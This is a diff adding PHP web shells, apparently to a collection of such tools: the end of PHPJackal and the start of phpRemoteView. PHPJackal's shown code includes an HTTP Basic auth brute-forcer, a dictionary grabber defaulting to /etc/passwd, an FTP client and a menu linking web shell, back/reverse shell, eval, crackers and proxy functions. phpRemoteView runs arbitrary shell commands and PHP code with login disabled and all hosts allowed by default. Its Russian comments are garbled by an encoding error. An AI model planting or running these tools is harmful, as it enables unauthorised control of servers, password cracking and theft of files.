+if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo '<font color=blue>Done</font>';
+}
+else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et<br>";
+}
+}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
+$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
+if($combo && $res){
+$file=file($_REQUEST['output']);
+$output=fopen($_REQUEST['output'],'w');
+foreach($file as $v)fwrite($output,"$v:$v\n");
+fclose($output);
+}
+echo '<font color=blue>Done</font>';
+}else{
+$temp=whereistmP().DIRECTORY_SEPARATOR;
+echo "<center>${t}Wordlist generator:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Range:</td><td bgcolor='#666666'><select name=range><option value=a>a-z</option><option value=A>A-Z</option><option value=1>0-9</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Min lenght:</td><td bgcolor='#808080'><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Max lenght:</td><td bgcolor='#666666'><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox name=combo style='border-width:1px;background-color:#666666;' value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Grab from:</td><td bgcolor='#666666'><input type=text value='/etc/passwd' name=input size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Grab></form>$et<br>${t}Download dictionary:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>URL:</td><td bgcolor='#666666'><input type=text value='http://vburton.ncsa.uiuc.edu/wordlist.txt' name=url size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Output:</td><td bgcolor='#808080'><input type=text value='$temp.dic' name=output size=35></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666'><input type=checkbox style='border-width:1px;background-color:#666666;' name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Get></form>$et</center>";}
+}
+function ftpclienT(){
+global $t,$cwd,$hcwd,$errorbox,$et;
+$td="<td bgcolor='#333333' width='50%'>";
+if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){
+$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];
+$con=ftp_connect($_REQUEST['hosT'],21,10);
+if($con){
+$ftp=ftp_login($con,$user,$pass);
+if($ftp){
+if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);
+if(!empty($_REQUEST['filE'])){
+$file=$_REQUEST['filE'];
+$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;
+if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);
+elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);
+elseif(isset($_REQUEST['rM'])){
+ftp_rmdir($con,$file);
+ftp_delete($con,$file);
+}
+elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);
+}
+$pwd=ftp_pwd($con);
+$dir=ftp_nlist($con,'');
+$d=opendir($cwd);
+echo "<table border=0 style='border-collapse: collapse' width='100%'><tr>${td}Server:</td>${td}Client:</td></tr><form method=POST><tr>$td<input type=text value='$pwd' name=PWD size=50><input value=Change class=buttons type=submit></td>$td<input size=50 type=text value='$cwd' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr>$td";
+foreach($dir as $n)echo "$n<br>";
+echo "</td>$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir<br>"; echo "</td></tr><tr>${td}Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td>$td<input type=hidden value='$user' name=useR><input type=hidden value='$pass' name=pasS><input type=hidden value='$host' name=hosT></form>$et";
+}else echo "$errorbox Wrong username or password$et";
+}else echo "$errorbox Can not connect to server!$et";
+}
+else{
+echo "<center>${t}FTP cilent:</td><form name=client method='POST'><td bgcolor='#333333'></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value=localhost name=hosT size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value=anonymous size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value=admin@nasa.gov name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et</center>";
+}
+}
+function calC(){
+global $t,$et,$hcwd;
+$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');
+if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
+$to=$_REQUEST['to'];
+echo "<center>${t}Output:<br><textarea rows='10' cols='64'>";
+if($to=='hex')for($i=0;$i<strlen($_REQUEST['input']);$i++)echo '%'.strtoupper(dechex(ord($_REQUEST['input']{$i}))); 
+else echo $to($_REQUEST['input']);
+echo "</textarea>$et</center><br>";
+}
+echo "<center>${t}Convertor:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Input:</td><td bgcolor='#666666'><textarea rows='10' name='input' cols='64'>";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#808080'>Task:</td><td bgcolor='#808080'><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>Crc32</option><option value=strrev>Reverse</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=decbin>Decimal to binary</option><option value=bindec>Binary to decimal</option><option value=dechex>Decimal to hex</option><option value=hexdec>Hex to decimal</option><option value=hex>ASCII to hex</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right><input class=buttons type=submit value=Convert>$hcwd</form>$et</center>";
+}
+function authcrackeR(){
+global $errorbox,$et,$t,$hcwd;
+if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
+$data='';
+$method=($_REQUEST['method'])?'POST':'GET';
+if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
+spliturL($_REQUEST['target'],$host,$page);
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
+if($method=='GET')$page.=$data;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+echo '<font color=blue>';
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$so=fsockopen($host,80,$en,$es,5);
+if(!$so){echo "$errorbox Can not connect to host$et";break;}
+else{
+$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
+if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);
+$packet.="\r\n\r\n";
+$packet.=$data;
+fputs($so,$packet);
+$res=substr(fgets($so),9,2);
+fclose($so);
+if($res=='20'){echo "U: $user P: $pass</br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");}
+}
+}
+echo 'Done!</font>';
+}else echo "<center><form method='POST' name=form>${t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
+}
+function openiT($name){
+$ext=strtolower(substr($name,strrpos($name,'.')+1));
+$src=array('php','php3','php4','phps','phtml','phtm','inc');
+if(in_array($ext,$src))highlight_file($name);
+else echo '<font color=blue><pre>'.htmlspecialchars(file_get_contents($name)).'</pre></font>';
+}
+function opensesS($name){
+$sess=file_get_contents($name);
+$var=explode(';',$sess);
+echo "<pre>Name\tType\tValue\r\n";
+foreach($var as $v){
+$t=explode('|',$v);
+$c=explode(':',$t[1]);
+$y='';
+if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
+echo $t[0]."\t$y\t".$c[1]."\r\n";
+}
+echo '</pre>';
+}
+function logouT(){
+setcookie('passw','',time()-10000);
+header('Location: '.hlinK());
+}
+?>
+<html>
+<head>
+<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
+<meta http-equiv="Content-Language" content="en-us">
+<script language="JavaScript" type="text/JavaScript">
+function HS(box){
+if(document.getElementById(box).style.display!="none"){
+document.getElementById(box).style.display="none";
+document.getElementById('lk').innerHTML="+";
+}
+else{
+document.getElementById(box).style.display="";
+document.getElementById('lk').innerHTML="-";
+}
+}
+function chmoD($file){
+$ch=prompt("Changing file mode["+$file+"]: ex. 777","");
+if($ch != null)location.href="<?php echo hlinK('seC=fm&workingdiR='.addslashes($cwd).'&chmoD=');?>"+$file+"&modE="+$ch;
+}
+</script>
+<title>PHPJackal [<?php echo $cwd; ?>]</title>
+</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
+<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=sqlcl&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=ftpc&workingdiR=$cwd"); ?>">[FTP]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mail]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=tools&workingdiR=$cwd");?>">[Tools]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href='".hlinK("seC=logout")."'>Logout</a>]";?></td></tr></table>
+<hr size=1 noshade>
+<?php
+if(!empty($_REQUEST['seC'])){
+switch($_REQUEST['seC']){
+case 'fm':filemanageR();break;
+case 'sc':scanneR();break;
+case 'phpinfo':phpinfo();break;
+case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
+if(!empty($_REQUEST['Save'])){
+$filehandle=fopen($_REQUEST['file'],'w');
+fwrite($filehandle,$_REQUEST['edited']);
+fclose($filehandle);}
+if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');
+break;
+case 'openit':openiT($_REQUEST['namE']);break;
+case 'cr':crackeR();break;
+case 'dic':dicmakeR();break;
+case 'tools':toolS();break;
+case 'hex':hexvieW();break;
+case 'img':showimagE($_REQUEST['filE']);break;
+case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;
+case 'hc':hashcrackeR();break;
+case 'fcr':formcrackeR();break;
+case 'auth':authcrackeR();break;
+case 'ftpc':ftpclienT();break;
+case 'eval':phpevaL();break;
+case 'snmp':snmpcrackeR();break;
+case 'px':pr0xy();break;
+case 'webshell':webshelL();break;
+case 'mailer':maileR();break;
+case 'br':brshelL();break;
+case 'asm':safemodE();break;
+case 'sqlcl':sqlclienT();break;
+case 'calc':calC();break;
+case 'sysinfo':sysinfO();break;
+case 'checksum':checksuM($_REQUEST['filE']);break;
+case 'logout':logouT();break;
+default: echo $intro;}}else echo $intro;
+echo $footer;?></body></html>
\ No newline at end of file
diff --git a/php/PHPRemoteView.php b/php/PHPRemoteView.php
new file mode 100644
index 0000000..155ae07
--- /dev/null
+++ b/php/PHPRemoteView.php
@@ -0,0 +1,1073 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ñïèñîê îäíîáóêâåííûõ ïàğàìåòğîâ, ñêîïèğîâàíî â $cs:
+   $cc[0] - ïî êàêîé êîëîíêå ñîğòèğîâàòü, à åñëè ıòî íå öèôğà:
+               n - ïî èìåíè
+               e - ğàñøèğåíèå
+   $cc[1] - ïîğÿäîê (0 - âîçğàñò. 1 - óáûâàşùèé)
+   $cc[2] - ïîêàçûâàòü ëè èêîíêè
+   $cc[3] - ÷òî äåëàòü ïğè êëèêå ïî èêîíêå ôàéëà:
+               0 - ïğîñìîòğ â text/plain
+               1 - ïğîñìîòğ â html
+               2 - download
+               3 - ïàğàìåòğû ôàéëà (info)
+   $cc[4] - îêğóãëÿòü ğàçìåğ ôàéëîâ äî Êá/Ìá/Ãá
+   $cc[5] - ÿçûê:
+               1 - àíãëèéñêèé
+               2 - ğóññêè
+
+$cn / $cp[1] - ñïèñîê êîëîíîê è èõ ïîğÿäîê, êîòîğûå ïîêàçûâàòü, ñòğîêà áóêâ/öèôğ:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ôîğìàò âğåìåíè
+
+$cp[3]: èìÿ øğèôòà
+
+$cp[4]: ğàçìåğ øğèôòà
+
+*/
+
+   // Êàê âûğàâíèâàòü êîëîíêè
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"Èíäåêñ",
+"View file"=>"Ïîêàç ôàéëà",
+"DISK"=>"ÄÈÑÊ",
+"Info"=>"Èíôî",
+"Plain"=>"Ïğÿìîé",
+"HTML"=>"HTML",
+"Session"=>"Ñåññèÿ",
+"Image"=>"Êàğòèíêà",
+"Notepad"=>"Áëîêíîò",
+"DOWNLOAD"=>"ÇÀÃĞÓÇÈÒÜ",
+"Edit"=>"Ïğàâêà",
+"Sorry, this programm run in read-only mode."=>"Èçâèíèòå, ıòà ïğîãğàììà ğàáîòàåò â ğåæèìå 'òîëüêî ÷òåíèå'.",
+"For full access: write"=>"Äëÿ ïîëíîãî äîñòóïà: íàïèøèòå",
+"in this php-file"=>"â ıòîì php-ôàéëå",
+"Reason"=>"Ïğè÷èíà",
+"Error path"=>"Îøèáî÷íûé ïóòü",
+"Click here for start"=>"Íàæìèòå äëÿ ñòàğòà",
+"up directory"=>"êàòàëîã âûøå",
+"access denied"=>"äîñòóï çàïğåùåí",
+"REMVIEW TOOLS"=>"ÓÒÈËÈÒÛ REMVIEW",
+"version"=>"âåğñèÿ",
+"Free download"=>"Áåñïëàòíàÿ çàãğóçêà",
+"back to directory"=>"âåğíóòüñÿ â êàòàëîã",
+"Size"=>"Ğàçìåğ",
+"Owner"=>"Îâíåğ",
+"Group"=>"Ãğóïïà",
+"FileType"=>"Òèï ôàéëà",
+"Perms"=>"Ïğàâà",
+"Create time"=>"Âğåìÿ ñîçäàíèÿ",
+"Access time"=>"Âğåìÿ äîñòóïà",
+"MODIFY time"=>"Âğåìÿ ÈÇÌÅÍÅÍÈß",
+"HEXDUMP PREVIEW"=>"ÏĞÅÄÏĞÎÑÌÎÒĞ Â 16-ĞÈ×ÍÎÌ ÂÈÄÅ",
+"ONLY READ ACCESS"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ",
+"Can't READ file - access denied"=>"Íå ìîãó ïğî÷èòàòü - äîñòóï çàïğåùåí",
+"full read/write access"=>"ïîëíûé äîñòóï íà ÷òåíèå/çàïèñü",
+"FILE SYSTEM COMMANDS"=>"ÊÎÌÀÍÄÛ ÔÀÉËÎÂÎÉ ÑÈÑÒÅÌÛ",
+"EDIT"=>"ĞÅÄÀÊÒ.",
+"FILE"=>"ÔÀÉË",
+"DELETE"=>"ÑÒÅĞÅÒÜ",
+"Delete this file"=>"Ñòåğåòü ôàéë",
+"CLEAN"=>"Î×ÈÑÒÈÒÜ",
+"TOUCH"=>"ÎÁÍÎÂÈÒÜ",
+"Set current 'mtime'"=>"Óñòàí.òåêóù.âğåìÿ",
+"WIPE(delete)"=>"ÓÍÈ×ÒÎÆÈÒÜ",
+"Write '0000..' and delete"=>"Çàáèòü íóëÿìè, ñòåğåòü",
+"COPY FILE"=>"ÊÎÏÈĞÎÂÀÒÜ ÔÀÉË",
+"COPY"=>"ÊÎÏÈĞÎÂÀÒÜ",
+"MAKE DIR"=>"ÑÎÇÄÀÒÜ ÊÀÒÀËÎÃ",
+"type full path"=>"ââåäèòå ïîëíûé ïóòü",
+"MkDir"=>"Ñîçä.Êàò.",
+"CREATE NEW FILE or override old file"=>"ÑÎÇÄÀÒÜ ÍÎÂÛÉ ÔÀÉË èëè ïåğåçàïèñàòü ñòàğûé",
+"CREATE/OVERRIDE"=>"ÑÎÇÄÀÒÜ/ÏÅĞÅÇÀÏÈÑÀÒÜ",
+"select file on your local computer"=>"âûáğàòü ôàéë íà âàøåì ëîêàëüíîì êîìïüşòåğå",
+"save this file on path"=>"ñîõğàíèòü ıòîò ôàéë â êàòàëîã",
+"create file name automatic"=>"ïğèäóìàòü èìÿ ôàéëó àâòîìàòè÷åñêè",
+"OR"=>"ÈËÈ",
+"type any file name"=>"ââåñòè èìÿ ôàéëà âğó÷íóş",
+"convert file name to lovercase"=>"êîíâåğòèğîâàòü èìÿ â íèæíèé ğåãèñòğ",
+"Send File"=>"Ïîñëàòü ôàéë",
+"Delete all files in dir"=>"Óäàëèòü âñå ôàéëû",
+"Delete all dir/files recursive"=>"Óäàëèòü ÂÑÅ +ïîäêàòàëîãè ğåêóğñèâíî",
+"Confirm not found (go back and set checkbox)"=>"Ïîäòâåğæäåíèå íå ïîñòàâëåíî (âåğíèòåñü íàçàä è ïîñòàâüòå ãàëî÷êó)",
+"Delete cancel - File not found"=>"Óäàëåíèå îòìåíåíî - Ôàéë íå íàéäåí",
+"YES"=>"ÄÀ",
+"ME"=>"ÌÅÍß",
+"NO (back)"=>"ÍÅÒ (íàçàä)",
+"Delete cancel"=>"Óäàëåíèå îòìåíåíî",
+"ACCESS DENIED"=>"ÄÎÑÒÓÏ ÇÀÏĞÅÙÅÍ",
+"done (go back)"=>"ãîòîâî (íàçàä)",
+"Delete ok"=>"Îê, óäàëåííî",
+"Touch cancel"=>"Îáíîâëåíèå îòìåíåíî",
+"Touch ok (set current time to 'modify time')"=>"Îáíîâëåíèå çàâåğøåíî (ôàéëó ïğèñâîåíî òåêóùåå âğåìÿ ìîäèôèêàöèè)",
+"Clean (empty file) cancel"=>"Î÷èùåíèå (îáíóëåíèå ôàéëà) îòìåíåíî",
+"Clean ok (file now empty)"=>"Îê, î÷èùåíî (ôàéë îáíóëåí)",
+"Wipe cancel - access denied"=>"Óíè÷òîæåíèå îòìåíåíî - äîñòóï çàïğåùåí",
+"Wipe ok (file deleted)"=>"Îê, óíè÷òîæåíî (è ôàéë ñòåğò)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"Óäàëåíèå âñåõ ôàéëîâ â",
+"skip"=>"ïğîïóñê",
+"deleting"=>"óäàëåíèå",
+"Deleting all dir/files (recursive) in"=>"Óäàëåíèå âñåõ ôàéëîâ/ïîäêàòàëîãîâ (ğåêóğñèâíî)",
+"DONE, go back"=>"ÃÎÒÎÂÎ, íàçàä",
+"DONE"=>"ÃÎÒÎÂÎ",
